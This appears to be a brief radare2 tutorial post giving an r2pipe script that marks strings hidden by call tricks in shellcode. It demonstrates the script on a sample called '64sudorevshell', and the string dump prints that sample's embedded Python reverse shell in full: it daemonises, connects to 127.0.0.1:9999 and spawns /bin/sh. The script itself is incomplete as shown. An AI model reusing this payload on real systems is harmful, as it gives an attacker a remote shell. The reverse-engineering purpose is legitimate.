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Are you using radare for reversing or debugging a shellcode/malware with a lot of call tricks for strings like these:
call @f
db "string1",0
more code
call @g:
db "string2",0
more code
Try this r2pipe ( script to fix disasm:
#!/usr/bin/env python3
# run inside r2 session: #!pipe python3
import r2pipe
r2 =
for e in r2.cmdj("izzj"):
if e['type'] == "ascii" and e['section'] == ".text":
# csa = f"Csa {e['size']} @ { e['vaddr']}"
csa = "Csa " + str(e['size']) + " @" + str(e['vaddr'])
This script search all C-STRING-STYLE in .text section and mark each one like string
Just use this script with "#!pipe python3" command inside your r2 session:
dreg@fr33project:~# r2 64sudorevshell
[0x00401000]> #!pipe python3
nth paddr vaddr len size section type string
0 0x0000105a 0x0040105a 524 525 .text ascii exec("""\nimport socket,subprocess,os,sys\n\npidrg = os.fork()\nif pidrg > 0:\n sys.exit(0)\n\nos.chdir("/")\n\nos.setsid()\n\nos.umask(0)\n\ndrgpid = os.fork()\nif drgpid > 0:\n sys.exit(0)\n\nsys.stdout.flush()\n\nsys.stderr.flush()\n\nfdreg = open("/dev/null", "w")\n\nsys.stdout = fdreg\n\nsys.stderr = fdreg\n\nsdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nsdregs.connect((str(0x7f000001),9999))\n\nos.dup2(sdregs.fileno(),0)\n\nos.dup2(sdregs.fileno(),1)\n\nos.dup2(sdregs.fileno(),2)\n\["/bin/sh","-i"])\n""")
1 0x00001274 0x00401274 11 12 .text ascii /bin/python
2 0x000012b7 0x004012b7 9 10 .text ascii /bin/sudo
3 0x00001479 0x00000001 18 19 .strtab ascii 64sudorevshell.asm
4 0x0000148c 0x00000014 6 7 .strtab ascii parent
5 0x00001493 0x0000001b 5 6 .strtab ascii child
6 0x00001499 0x00000021 4 5 .strtab ascii arg3
7 0x000014a2 0x0000002a 4 5 .strtab ascii arg2
8 0x000014ab 0x00000033 4 5 .strtab ascii arg1
9 0x000014b0 0x00000038 4 5 .strtab ascii drgs
10 0x000014b9 0x00000041 6 7 .strtab ascii end_sc
11 0x000014c0 0x00000048 11 12 .strtab ascii __bss_start
12 0x000014cc 0x00000054 6 7 .strtab ascii _edata
13 0x000014d3 0x0000005b 4 5 .strtab ascii _end
14 0x000014d9 0x00000001 7 8 .shstrtab ascii .symtab
15 0x000014e1 0x00000009 7 8 .shstrtab ascii .strtab
16 0x000014e9 0x00000011 9 10 .shstrtab ascii .shstrtab
17 0x000014f3 0x0000001b 18 19 .shstrtab ascii
18 0x00001506 0x0000002e 5 6 .shstrtab ascii .text
Csa 525 @4198490
Csa 12 @4199028
Csa 10 @4199095
Greetz to Maijin for hints in #radare channel